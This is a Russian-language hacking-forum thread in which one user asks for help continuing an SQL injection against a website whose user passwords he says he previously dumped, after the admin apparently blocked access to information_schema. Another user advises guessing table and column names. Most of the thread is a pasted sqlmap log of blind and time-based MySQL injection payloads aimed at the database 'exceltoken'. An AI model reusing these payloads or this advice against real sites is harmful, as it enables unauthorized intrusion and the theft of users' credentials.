PDA

Просмотр полной версии : помогите с иньекцией

slipknot13
14.10.2017, 16:10
раньше таблицы дампил а щас не могу

http://rgho.st/7DGXQ4dcm/image.png (http://rgho.st/7DGXQ4dcm.view)

http://rgho.st/7DGXQ4dcm
erwerr2321
14.10.2017, 16:20
slipknot13 said:
↑ (https://antichat.live/posts/4138498/)
раньше таблицы дампил а щас не могу


почему?
slipknot13
14.10.2017, 17:22
мне кажется что админ поставил какую то защиту , раньше можно было пароли пользователей сдампить а сейчас нет , на сайте вручную пробую Unauthorized Access
erwerr2321
14.10.2017, 17:27
ну, а information_schema раньше была?
slipknot13
14.10.2017, 17:46
да
erwerr2321
14.10.2017, 17:54
ну вот... а теперь её нет.

те тебе сначала нужно подобрать тэйбл нэймы, а потом уже колумн нэймы нужной тебе таблицы.
slipknot13
14.10.2017, 19:10
я вроде как знаю названия таблиц но их не находит sqlmap
slipknot13
14.10.2017, 19:42
может расскажеш как подобрать тейбл неймы
slipknot13
14.10.2017, 21:55
лог sqlmap

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>66

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>52

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>48

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>1

[19:41:47] [INFO] retrieved:

[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>66),SLEEP(10),9830)

[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>170454),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>819325),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>261031),SLEEP(10),9830)

.

[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>164592),SLEEP(10),9830)

.

[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>160487),SLEEP(10),9830)

.

[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>871054),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>913561),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>478526),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>192387),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>330357),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>385436),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>145149),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>823404),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>142557),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>848401),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>487756),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>840171),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>800333),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>899978),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>502795),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>128986),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>227072),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>648363),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>656500),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>280401),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>721896),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>769715),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>689458),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>747115),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>103578),SLEEP(10),9830)

. (done)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>52),SLEEP(10),9830)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>48),SLEEP(10),9830)

[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>1),SLEEP(10),9830)

[19:42:02] [INFO] retrieved:

[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds

[19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel

token'

[19:42:02] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'